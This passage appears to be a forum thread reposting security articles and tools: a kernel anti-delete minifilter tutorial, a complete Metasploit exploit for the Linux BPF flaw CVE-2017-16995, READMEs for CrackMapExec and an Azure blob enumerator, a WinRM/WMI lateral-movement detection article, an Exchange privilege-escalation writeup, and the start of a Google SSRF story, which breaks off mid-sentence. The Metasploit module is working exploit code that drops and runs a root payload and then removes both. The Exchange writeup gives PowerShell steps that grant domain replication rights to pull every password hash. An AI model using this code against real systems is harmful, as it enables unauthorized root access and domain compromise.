Driver 1 | <+ IRP being sent down | +------------+ | the driver stack. | ... | (If file should be | +------------+ | (If the file should not protected, send it ----> +- | Our driver | <+ be protected, continue back up prematurely.) +------------+ sending it down.) ... +------------+ | Driver n | +------------+ ... +------------+ | Device | +------------+ Anti Delete So time for some juicy code to put theory to practice. The following code is example code of a “minifilter” driver which mainly handles file system requests. // The callbacks array defines what IRPs we want to process. CONST FLT_OPERATION_REGISTRATION Callbacks[] = { { IRP_MJ_CREATE, 0, PreAntiDelete, NULL }, // DELETE_ON_CLOSE creation flag. { IRP_MJ_SET_INFORMATION, 0, PreAntiDelete, NULL }, // FileInformationClass == FileDispositionInformation(Ex). { IRP_MJ_OPERATION_END } }; CONST FLT_REGISTRATION FilterRegistration = { sizeof(FLT_REGISTRATION), // Size FLT_REGISTRATION_VERSION, // Version 0, // Flags NULL, // ContextRegistration Callbacks, // OperationRegistration Unload, // FilterUnloadCallback NULL, // InstanceSetupCallback NULL, // InstanceQueryTeardownCallback NULL, // InstanceTeardownStartCallback NULL, // InstanceTeardownCompleteCallback NULL, // GenerateFileNameCallback NULL, // NormalizeNameComponentCallback NULL // NormalizeContextCleanupCallback }; PFLT_FILTER Filter; static UNICODE_STRING ProtectedExtention = RTL_CONSTANT_STRING(L"PROTECTED"); NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) { // We can use this to load some configuration settings. UNREFERENCED_PARAMETER(RegistryPath); DBG_PRINT("DriverEntry called.\n"); // Register the minifilter with the filter manager. NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &Filter); if (!NT_SUCCESS(status)) { DBG_PRINT("Failed to register filter: <0x%08x>.\n", status); return status; } // Start filtering I/O. status = FltStartFiltering(Filter); if (!NT_SUCCESS(status)) { DBG_PRINT("Failed to start filter: <0x%08x>.\n", status); // If we fail, we need to unregister the minifilter. FltUnregisterFilter(Filter); } return status; } First of all, the IRPs that should be processed by the driver are IRP_MJ_CREATE 1 and IRP_MJ_SET_INFORMATION 1 which are requests made when a file (or directory) is created and when metadata is being set, respectively. Both of these IRPs have the ability to delete a file which will be detailed later. The Callbacks array is defined with the respective IRP to be processed and the pre-operation and post-operation callback functions. The pre-operation defines the function that is called when the IRP goes down the stack while the post-operation is the function that is called when the IRP goes back up after it has been completed. Note that the post-operation is NULL as this scenario does not require one; the interception of file deletion is only handled in the pre-operation. DriverEntry is the driver’s main function where the registration with the filter manager is performed using FltRegisterFilter. Once that is successful, to start filtering IRPs, it must call the FltStartFiltering function with the filter handle. Also note that we have defined the extension to protect as .PROTECTED as aforementioned. It is also good practice to define an unload function so that if the driver has been requested to stop, it can perform an necessary cleanups. Its reference in this article is purely for completeness and does not serve any purpose for the main content. /* * This is the driver unload routine used by the filter manager. * When the driver is requested to unload, it will call this function * and perform the necessary cleanups. */ NTSTATUS Unload(_In_ FLT_FILTER_UNLOAD_FLAGS Flags) { UNREFERENCED_PARAMETER(Flags); DBG_PRINT("Unload called.\n"); // Unregister the minifilter. FltUnregisterFilter(Filter); return STATUS_SUCCESS; } The final function in this code is the PreAntiDelete pre-operation callback which handles the IRP_MJ_CREATE and IRP_MJ_SET_INFORMATION IRPs. IRP_MJ_CREATE includes functions that request a “file handle or file object or device object”[1] to be opened such as ZwCreateFile. IRP_MJ_SET_INFORMATION includes functions that request to set “metadata about a file or a file handle”[2] such as ZwSetInformationFile. /* * This routine is called every time I/O is requested for: * - file creates (IRP_MJ_CREATE) such as ZwCreateFile and * - file metadata sets on files or file handles * (IRP_MJ_SET_INFORMATION) such as ZwSetInformation. * * This is a pre-operation callback routine which means that the * IRP passes through this function on the way down the driver stack * to the respective device or driver to be handled. */ FLT_PREOP_CALLBACK_STATUS PreAntiDelete(_Inout_ PFLT_CALLBACK_DATA Data, _In_ PCFLT_RELATED_OBJECTS FltObjects, _Flt_CompletionContext_Outptr_ PVOID *CompletionContext) { UNREFERENCED_PARAMETER(CompletionContext); /* * This pre-operation callback code should be running at * IRQL <= APC_LEVEL as stated in the docs: * https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/writing-preoperation-callback-routines * and both ZwCreateFile and ZwSetInformaitonFile are also run at * IRQL == PASSIVE_LEVEL: * - ZwCreateFile: https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/nf-ntifs-ntcreatefile#requirements * - ZwSetInformationFile: https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/nf-ntifs-ntsetinformationfile#requirements */ PAGED_CODE(); /* * By default, we don't want to call the post-operation routine * because there's no need to further process it and also * because there is none. */ FLT_PREOP_CALLBACK_STATUS ret = FLT_PREOP_SUCCESS_NO_CALLBACK; // We don't care about directories. BOOLEAN IsDirectory; NTSTATUS status = FltIsDirectory(FltObjects->FileObject, FltObjects->Instance, &IsDirectory); if (NT_SUCCESS(status)) { if (IsDirectory == TRUE) { return ret; } } /* * We don't want anything that doesn't have the DELETE_ON_CLOSE * flag. */ if (Data->Iopb->MajorFunction == IRP_MJ_CREATE) { if (!FlagOn(Data->Iopb->Parameters.Create.Options, FILE_DELETE_ON_CLOSE)) { return ret; } } /* * We don't want anything that doesn't have either * FileDispositionInformation or FileDispositionInformationEx or * file renames (which can just simply rename the extension). */ if (Data->Iopb->MajorFunction == IRP_MJ_SET_INFORMATION) { switch (Data->Iopb->Parameters.SetFileInformation.FileInformationClass) { case FileRenameInformation: case FileRenameInformationEx: case FileDispositionInformation: case FileDispositionInformationEx: case FileRenameInformationBypassAccessCheck: case FileRenameInformationExBypassAccessCheck: case FileShortNameInformation: break; default: return ret; } } /* * Here we can check if we want to allow a specific process to fall * through the checks, e.g. our own application. * Since this is a PASSIVE_LEVEL operation, we can assume(?) that * the thread context is the thread that requested the I/O. We can * check the current thread and compare the EPROCESS of the * authenticated application like so: * * if (IoThreadToProcess(Data->Thread) == UserProcess) { * return FLT_PREOP_SUCCESS_NO_CALLBACK; * } * * Of course, we would need to find and save the EPROCESS of the * application somewhere first. Something like a communication port * could work. */ PFLT_FILE_NAME_INFORMATION FileNameInfo = NULL; // Make sure the file object exists. if (FltObjects->FileObject != NULL) { // Get the file name information with the normalized name. status = FltGetFileNameInformation(Data, FLT_FILE_NAME_NORMALIZED | FLT_FILE_NAME_QUERY_DEFAULT, &FileNameInfo); if (NT_SUCCESS(status)) { // Now we want to parse the file name information to get the extension. FltParseFileNameInformation(FileNameInfo); // Compare the file extension (case-insensitive) and check if it is protected. if (RtlCompareUnicodeString(&FileNameInfo->Extension, &ProtectedExtention, TRUE) == 0) { DBG_PRINT("Protecting file deletion/rename!"); // Strings match, deny access! Data->IoStatus.Status = STATUS_ACCESS_DENIED; Data->IoStatus.Information = 0; // Complete the I/O request and send it back up. ret = FLT_PREOP_COMPLETE; } // Clean up file name information. FltReleaseFileNameInformation(FileNameInfo); } } return ret; } For IRP_MJ_CREATE, we want to check for the FILE_DELETE_ON_CLOSE create option which is described as "Delete the file when the last handle to it is passed to NtClose. If this flag is set, the DELETE flag must be set in the DesiredAccess parameter."[3] If this flag is not present, we do not care about it so it is passed down the stack for further processing as represented by the FLT_PREOP_SUCCESS_NO_CALLBACK return value. Note that the NO_CALLBACK means that the post-operation routine should not be called when the IRP is completed and passed back up the stack which is what should always be returned by this function as there is no post-operation. For IRP_MJ_SET_INFORMATION, the FileInformationClass parameter should be checked. The FileDispositionInformation value is described as "Usually, sets the DeleteFile member of a FILE_DISPOSITION_INFORMATION to TRUE, so the file can be deleted when NtClose is called to release the last open handle to the file object. The caller must have opened the file with the DELETE flag set in the DesiredAccess parameter."[4]. To prevent the file from simply being renamed such that the protected extension no longer exists, the FileRenameInformation and FileShortNameInformation values must also be checked. If the driver receives an IRP request that is selected for file deletion, it must parse the file name information to extract the extension by using the FltGetFileNameInformation and FltParseFileNameInformation functions. Then it is a simple string comparison between the requested file for deletion’s extension and the protected extension to determine whether the delete operation should be allowed or disallowed. In the case of an unauthorised file deletion, the status of the operation is set to STATUS_ACCESS_DENIED and the pre-operation function completes the IRP. Demonstration Attempt to delete the file: VirtualBox_Windows 7 x86 Kernel Development_17_07_2018_00_59_09.png1366x768 82.8 KB Attempt to rename the file: VirtualBox_Windows 7 x86 Kernel Development_17_07_2018_00_59_24.png1366x768 84.7 KB FIN Hope that was educational and somewhat interesting or motivational. As usual, you can find the code on my GitHub 15. Thanks for reading! Sursa: https://0x00sec.org/t/kernel-mode-rootkits-file-deletion-protection/7616
      • 2
      • Upvote
      • Thanks
  20. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linux BPF Sign Extension Local Privilege Escalation', 'Description' => %q{ Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF) which contains a vulnerability where it may improperly perform sign extension. This can be utilized to escalate privileges. The target system must be compiled with BPF support and must not have kernel.unprivileged_bpf_disabled set to 1. This module has been tested successfully on: Debian 9.0 kernel 4.9.0-3-amd64; Deepin 15.5 kernel 4.9.0-deepin13-amd64; ElementaryOS 0.4.1 kernel 4.8.0-52-generic; Fedora 25 kernel 4.8.6-300.fc25.x86_64; Fedora 26 kernel 4.11.8-300.fc26.x86_64; Fedora 27 kernel 4.13.9-300.fc27.x86_64; Gentoo 2.2 kernel 4.5.2-aufs-r; Linux Mint 17.3 kernel 4.4.0-89-generic; Linux Mint 18.0 kernel 4.8.0-58-generic; Linux Mint 18.3 kernel 4.13.0-16-generic; Mageia 6 kernel 4.9.35-desktop-1.mga6; Manjero 16.10 kernel 4.4.28-2-MANJARO; Solus 3 kernel 4.12.7-11.current; Ubuntu 14.04.1 kernel 4.4.0-89-generic; Ubuntu 16.04.2 kernel 4.8.0-45-generic; Ubuntu 16.04.3 kernel 4.10.0-28-generic; Ubuntu 17.04 kernel 4.10.0-19-generic; ZorinOS 12.1 kernel 4.8.0-39-generic. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jann Horn', # Discovery 'bleidl', # Discovery and get-rekt-linux-hardened.c exploit 'vnik', # upstream44.c exploit 'rlarabee', # cve-2017-16995.c exploit 'h00die', # Metasploit 'bcoles' # Metasploit ], 'DisclosureDate' => 'Nov 12 2017', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'AKA', 'get-rekt-linux-hardened.c' ], [ 'AKA', 'upstream44.c' ], [ 'BID', '102288' ], [ 'CVE', '2017-16995' ], [ 'EDB', '44298' ], [ 'EDB', '45010' ], [ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ], [ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ], [ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ], [ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ], [ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ], [ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ], [ 'URL', 'https://usn.ubuntu.com/3523-2/' ], [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ], [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ], [ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2'], [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd rm_f "#{path}.c" unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable." end cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" if unprivileged_bpf_disabled? vprint_error 'Unprivileged BPF loading is not permitted' return CheckCode::Safe end vprint_good 'Unprivileged BPF loading is permitted' release = kernel_release if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') || Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0') vprint_error "Kernel version #{release} is not vulnerable" return CheckCode::Safe end vprint_good "Kernel version #{release} appears to be vulnerable" CheckCode::Appears end def exploit unless check == CheckCode::Appears fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!' end if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile executable_path, exploit_data('exploit.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('exploit.out') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit ...' output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path} " output.each_line { |line| vprint_status line.chomp } print_status "Cleaning up #{payload_path} and #{executable_path} ..." rm_f executable_path rm_f payload_path end end Sursa: https://www.exploit-db.com/exploits/45058/
      • 1
      • Upvote
  21. CrackMapExec Acknowledgments (These are the people who did the hard stuff) This project was originally inspired by: smbmap CredCrack smbexec Unintentional contributors: The Empire project @T-S-A's smbspider script @ConsciousHacker's partial Python port of Invoke-obfuscation from the GreatSCT project This repository contains the following repositories as submodules: Impacket Pywinrm Pywerview PowerSploit Invoke-Obfuscation Invoke-Vnc Mimikittenz NetRipper RandomPS-Scripts SessionGopher Mimipenguin Documentation, Tutorials, Examples See the project's wiki for documentation and usage examples Installation Please see the installation wiki page here. How to fund my tea & sushi reserve BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr To do Kerberos support 0wn everything Sursa: https://github.com/byt3bl33d3r/CrackMapExec
  22. MicroBurst A collection of scripts for assessing Microsoft Azure security Invoke-EnumerateAzureBlobs.ps1 PS C:> Get-Help Invoke-EnumerateAzureBlobs NAME: Invoke-EnumerateAzureBlobs SYNOPSIS: PowerShell function for enumerating public Azure Blobs and Containers. SYNTAX: Invoke-EnumerateAzureBlobs [[-Base] ] [[-OutputFile] ] [[-Permutations] ] [[-Folders] ] [[-BingAPIKey] ] [] DESCRIPTION: The function will check for valid .blob.core.windows.net host names via DNS. If a BingAPIKey is supplied, a Bing search will be made for the base word under the .blob.core.windows.net site. After completing storage account enumeration, the function then checks for valid containers via the Azure REST API methods. If a valid container has public files, the function will list them out. -------------------------- EXAMPLE 1 -------------------------- PS C:\>Invoke-EnumerateAzureBlobs -Base secure Found Storage Account - secure.blob.core.windows.net Found Storage Account - testsecure.blob.core.windows.net Found Storage Account - securetest.blob.core.windows.net Found Storage Account - securedata.blob.core.windows.net Found Storage Account - securefiles.blob.core.windows.net Found Storage Account - securefilestorage.blob.core.windows.net Found Storage Account - securestorageaccount.blob.core.windows.net Found Storage Account - securesql.blob.core.windows.net Found Storage Account - hrsecure.blob.core.windows.net Found Storage Account - secureit.blob.core.windows.net Found Storage Account - secureimages.blob.core.windows.net Found Storage Account - securestorage.blob.core.windows.net Found Container - hrsecure.blob.core.windows.net/NETSPItest Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/SuperSecretFile.txt Found Container - secureimages.blob.core.windows.net/NETSPItest123 RELATED LINKS: https://blog.netspi.com/anonymously-enumerating-azure-file-resources/ Sursa: https://github.com/NetSPI/MicroBurst
      • 1
      • Upvote
  23. Lateral Movement Using WinRM and WMI Tony LambertNovember 20, 2017 Many organizations invest millions of dollars to bolster their systems and prevent attackers from gaining entry. Much less attention is given to the concept of lateral movement within an organization. Yet we’ve seen time and time again that once an adversary breaks through the crunchy outer layer of the network, the gooey center quickly becomes trivial to move about. Stopping lateral movement is just as important as preventing a breach. Attackers frequently move laterally with tools included in Windows, and this tactic has also been observed within commodity malware samples. This article will outline a threat detection in which Windows Remote Management (WinRM) spawned a process via Windows Management Instrumentation (WMI). First, let’s take a look at normal execution of WinRM and why it’s important to secure it. How WinRM Usually Works Normal execution of WinRM involves the configuration and inspection of the Windows Remote Management subsystem. This subsystem has been part of Windows by default since Windows Vista, and it has evolved to power the new way of remote management: PowerShell Remoting. Essentially, Windows has a built-in-by-default system that lends itself well to lateral movement and it’s up to administrators to secure it properly. If admins don’t take the right steps, attackers can use stolen credentials to launch processes on multiple computers across the network. Within minutes, an incident can grow from a single compromised system to hundreds using built-in tools in Windows. We usually see simple commands such as “winrm get config” or “winrm quickconfig.” In this case, we noticed something very different… What are we seeing and why isn’t it normal? Functionality of the WinRM command is provided through a Visual Basic Script, so it’s natural to see WinRM configuration performed from the CScript utility. The command of concern used with WinRM here is the “invoke” command. This command allows WinRM to work with management resources defined by the Windows operating system, primarily through WMI. After looking into the structure of a WinRM command, we discovered that whatever comes after “invoke” is a method defined per management resource or WMI class. In this case, the Win32_Process WMI class has a “Create” method. This allows the user of WinRM to execute a process via WMI. Now we can interpret the rest of the command. The screenshot below enumerates three things to note. The “-r” switch (1) signifies the WinRM Invoke statement is being executed on a remote host specified at the “HTTPS” address. This is significant because if we look at the host this command was executed from, we won’t find evidence of what happened after this command. To get visibility from here, we’d need to jump over to the remote host and observe what happened. The “-a” (2) and “-c” (3) switches signify the attacker authenticated to the remote host using a certificate identified by the specified thumbprint. At this point it should be becoming apparent this isn’t normal. There are much better ways to run simple applications when authorized to do so. For example, legitimate system administrators can use PowerShell Remoting or PsExec commands to run applications on remote computers. And when on a local computer, users can simply double-click on applications or launch them through the Command Shell or PowerShell. Quite simply, processes started in this fashion are an anomaly. But, hey… at least the attacker used encryption when connecting to the host! How to Detect This Threat A detection engineer originally found this event due to other bad behavior on the endpoint and realized we needed a way to better detect it. To get more information about its detection, we jumped into a test lab to look at different permutations of this attack. We realized the attack would be slightly different if the attacker had left out the remote connectivity options, so we began there. In most cases when a command launches another command, we expect to see the second one spawn as a child process of the first. So in theory we would expect WinRM to spawn a process as a child to “CScript.exe.” Once we got into the lab, we found a different reality: CScript had no child processes! Not only that, it didn’t modify any files or leave any other telltale signs that a process had been spawned. So we needed to dive deeper to find how Notepad executed… Notepad spawned as a child process of “wmiprvse.exe,” a binary whose function allows WMI to interface with the rest of the Windows operating system. Our WinRM command simply submitted an operation to WMI, and WMI used its own interfaces to execute that operation and spawn a process. Our initial detection specified a remote host, so our next round of testing needed a remote host. This time around, we raised the stakes by attempting to execute “vssadmin.exe” instead of Notepad since we’ve observed lateral movement used with vssadmin during ransomware attacks. When we examined the execution of vssadmin, we discovered that it spawned from “wmiprvse.exe” just like our first test (which did not involve a remote host). This time around there was another catch: we didn’t see a network connection from “wmiprvse.exe”. In fact, we had to search around to find the connection, and it was shown as established by one of the “svchost” processes. This is due to the nature of WinRM, since it executes as a Windows Service and makes all the relevant network connections on behalf of the processes that use it. To expand your detection functions for this attack, you’ll need to monitor processes spawning from “wmiprvse.exe” and suspicious network connections to “svchost.” For those interested in monitoring processes spawning from WMI, be warned! It gets noisy, and you’ll need to establish a baseline of what looks normal in your environment. Once you can outline legitimate activity from your admins, you can focus on spotting evil. How to Mitigate This Threat WinRM can be secured in a few different ways. First, system admins should establish a management network architecture that lends itself to increased security. This involves establishing a jumpbox that is only used for remote administration functions. This strategy helps secure a network by forcing this privileged activity through a single controlled and hardened system, therefore not exposing sensitive credentials to attack. It also helps secure WinRM directly because we can limit the number of hosts trusted by the WinRM subsystem. In an ideal environment, client computers in the organization should not trust one another, and they should only trust the jumpbox systems. To configure what trusted hosts are allowed to contact WinRM, we can execute the following command: winrm set winrm/config/client '@{TrustedHosts="JumpBox1,JumpBox2"}' This configuration can also be enforced using Group Policy objects in an Active Directory environment. This can be accomplished via a policy with the “Allow remote server management through WinRM” setting, and specifying a list of hosts to trust. For authentication to WinRM for management, keep the defaults when possible as they don’t allow the less secure methods of authentication (Kerberos is default). Finally, WinRM default configurations establish both an HTTP and HTTPS listener. If you can, endeavor to disable the HTTP listener and only use WinRM over HTTPS. This may involve diving deeper into SSL/TLS certificates in your organization, so approach that with careful planning. Key Takeaways Preventing malicious lateral movement is just as important as preventing the initial breach. Limiting this movement helps security teams “stop the bleeding” during an incident and prevent it from becoming a full scale breach. Detection of this threat is difficult as WMI processes are noisy, but a solid understanding of your network makes it much easier. Taking action against this threat is a great way to defend your organization and stop a breach in its tracks! Sursa: https://redcanary.com/blog/lateral-movement-winrm-wmi/
  24. Exchange-AD-Privesc This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security. This is a side project of AD-Control-Paths, an AD permissions auditing project to which I recently added some Exchange-related modules. General considerations For pentesters looking to take control of an AD domain, Exchange is a valid intermediary target. The servers are much less secured than domain controllers by default and the control groups are distinct in the usual permissions models, which provides numerous alternative targets. They are also more difficult to migrate and business critical, so organizations often adopt a slower migration process for Exchange than for AD and do not specifically harden the servers. Exchange deployment on an Active Directory domain is an interesting case. Many attributes and classes are added to the schema, security groups are created and DACL on some AD objects are heavily modified. Basically, you can select among 3 permissions models: RBAC Split (recommended and most commonly deployed) Shared permissions (default) AD Split Particularly, DACLs for RBAC Split and Shared models are enumerated here: https://technet.microsoft.com/en-us/library/ee681663(v=exchg.150).aspx . High value targets: Exchange Trusted Subsystem and Exchange Windows Permissions groups, which are trustees for many ACE added during deployment on AD objects. Exchange servers: they are members of Exchange Trusted Subsystem and Exchange Windows Permissions groups. They can be compromised using many more techniques than domain controllers: local administrators domain accounts, Kerberos delegation, SMB relay, RODC replication, etc. The usual stuff. Organization admins: they are part of the local administrators group on Exchange servers. They also have full control on the OU containing the Exchange security groups. They can launch service/psexec/runas/... under computer identity/NetworkService/LocalSystem to control Exchange Trusted Subsystem and Exchange Windows Permissions SIDs. 1. Domain object DACL privilege escalation A privilege escalation is possible from the Exchange Windows permissions (EWP) security group to compromise the entire prepared Active Directory domain. DISCLAIMER: This issue has been responsibly disclosed to MSRC in October 2017 and after a few back and forth emails, they decided it was working as intended and would not fix it. Description of the issue When preparing Exchange 2010/2013/2016 installation in Shared permissions (default) or RBAC split permissions, some ACEs are positioned on the domain object for the Exchange Windows Permissions security group. This happens during the "Setup /PrepareDomain" command. Two ACEs on the domain object are missing the INHERIT_ONLY_ACE bit in the Flags field. This is their SDDL representation : (OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;<SID of EWP>) (OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;<SID of EWP>) Notice the missing 'IO' (inherit_only) flag. As a matter of fact, INHERITED_OBJECT_TYPE ACE effectively apply to the object itself when the inherit_only flag is not set. This is how they are documented on Technet, so it is definitely missing that information: Account ACE type Inheritance Permissions On property/ Applies to Comments Exchange Windows Permissions Allow ACE All WriteDACL / user Exchange Windows Permissions Allow ACE All WriteDACL / inetOrgPerson This is how they appear in the GUI (DSA console), which is also missing that information: The issue can be confirmed in the "Effective Access" tab of the domain object when specifying EWP. Coincidentally, INHERITED_OBJECT_TYPE ACE created with DSA console always have the IO flag. Creating a 'self and specific descendents', INHERITED_OBJECT_TYPE ACE is only possible programmatically and only viewable programmatically. Technical consequence The Allow permission to WriteDACL is granted to the Trustee on the domain object itself and not only on its user/inetOrgPerson descendants, effectively giving complete control to anyone with the Exchange Windows Permissions SID in its token. Expected behavior The Allow permission to WriteDACL should only be given on child objects matching the INHERITED_OBJECT_TYPE Guid. It is supposed to only apply to user or inetOrgPerson classes. This is not consistent with the other INHERITED_OBJECT_TYPE ACEs on the domain object for the same Trustee, which all have the INHERIT_ONLY_ACE bit in the Flags field. Security Consequence A privilege escalation is possible from the Exchange Windows permissions (EWP) security group to compromise the entire prepared Active Directory domain. Just set the Ds-Replication-Get-Changes-All extended right on the domain object. This is enough to use a DRSUAPI replication tool ala DCSync to get all the domain secrets (Kerberos keys, hashes, etc.). You can control the SID of the EWP group from Organization management, from Account operators or from any Exchange server. Interestingly, the RBAC system is proxified through EWP so a privilege escalation is possible from the Active Directory Permissions RBAC role to compromise the entire prepared Active Directory domain. Proof of concept 1: Set-Acl (or with DSA console) From an Organization Management member account, add yourself to Exchange Windows Permissions. This is possible by default (see the above technet page). $id = [Security.Principal.WindowsIdentity]::GetCurrent() $user = Get-ADUser -Identity $id.User Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members $user RELOG to update groups in your token then give yourself Ds-Replication-Get-Changes-All extended right on the domain object. $acl = get-acl "ad:DC=test,DC=local" $id = [Security.Principal.WindowsIdentity]::GetCurrent() $user = Get-ADUser -Identity $id.User $sid = new-object System.Security.Principal.SecurityIdentifier $user.SID # rightsGuid for the extended right Ds-Replication-Get-Changes-All $objectguid = new-object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 $identity = [System.Security.Principal.IdentityReference] $sid $adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight" $type = [System.Security.AccessControl.AccessControlType] "Allow" $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None" $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType $acl.AddAccessRule($ace) Set-acl -aclobject $acl "ad:DC=test,DC=com" Proof of concept 2: RBAC Add-ADPermission The following Powershell code, executed by a user account with the RBAC role Active Directory Permissions, sets the Ds-Replication-Get-Changes-All extended right on the domain object. $id = [Security.Principal.WindowsIdentity]::GetCurrent() Add-ADPermission "DC=test,DC=local" -User $id.Name -ExtendedRights Ds-Replication-Get-Changes-All Workaround fix Use the Fix-DomainObjectDACL.ps1 Powershell script in this repository. Read it, test it, use it at your own risk. By default, it checks the two faulty ACE, this can be done by any user. Use with -Fix switch with Domain Admins privileges to set the inherit_only missing flags. Another option is doing it manually with LDP. Bind as a Domain Admin account with the usual precautions, as you will change the domain object DACL. Locate the 2 faulty ACE in the DACL of the domain object: you can sort by Trustee to see Exchange Windows Permissions, there will only be 2 ACE with "Write DACL,..." Rights. Check the 'Inherit only' box in their ACE flags field. Sursa: https://github.com/gdedrouas/Exchange-AD-Privesc
  25. Into the Borg – SSRF inside Google production network July 20, 2018 | 5 Comments Intro – Testing Google Sites and Google Caja In March 2018, I reported an XSS in Google Caja, a tool to securely embed arbitrary html/javascript in a webpage. In May 2018, after the XSS was fixed, I realised that Google Sites was using an unpatched version of Google Caja, so I looked if it was vulnerable to the XSS. However, the XSS wasn’t exploitable there. Google Caja parses html/javascript and modifies it to remove any javascript sensitive content, such as iframe or object tags and javascript sensitive properties such as document.cookie. Caja mostly parses and sanitizes HTML tags on the client side. However, for remote javascript tag (<script src=”xxx”>), the remote resource was fetched, parsed and sanitized on the server-side. I tried to host a javascript file on my server (https://[attacker].com/script.js) and check if the Google Sites server would fall for the XSS when parsed server-side but the server replied that https://[attacker].com/script.js was not accessible. After a few tests, I realised that the Google Sites Caja server would only fetch Google-owned resources like https://www.google.com or https://www.gstatic.com, but not any external resource like https://www.facebook.com. That’s a strange behavior because this functionality is meant to fetch external resources so it looks like a broken feature. More interestingly, it is hard to determine whether an arbitrary URL belongs to Google or not, given the breadth of Google services. Unless… Finding an SSRF in Google Whenever I find an endpoint that fetches arbitrary content server-side, I always test for SSRF. I did it a hundred times on Google services but never had any luck. Anyway the only explanation for the weird behavior of the Google Caja server was that the fetching was happening on the internal Google network and that is why it could only fetch Google-owned resources but not external resources. I already knew this was a bug, now the question was whether it was a security bug! It’s very easy to host and run arbitrary code on Google servers, use Google Cloud services! I created a Google App Engine instance and hosted a javascript file. I then used the URL of this javascript file on Google Sites as a external script resource and updated the Google Sites page. The javascript was successfully fetched and parsed by Google Caja server. I then checked my Google App Engine instance logs to see from where the resource was fetched and it came from 10.x.x.201, a private network IP! This looked very promising. I used the private IP as the url for the Google Sites javascript external resource and waited for the moment of truth. The request took more than 30 seconds to complete and at that time I really thought the request was blocked and I almost closed the page since I never had any luck with SSRF on Google before. However, when Google Caja replied, I saw that the reply size wasn’t around 1 KB like for a typical error message but 1 MB instead! One million bytes of information coming from a 10.x.x.x IP from Google internal network, I can tell you I was excited at this point! ? I opened the file and indeed it was full of private 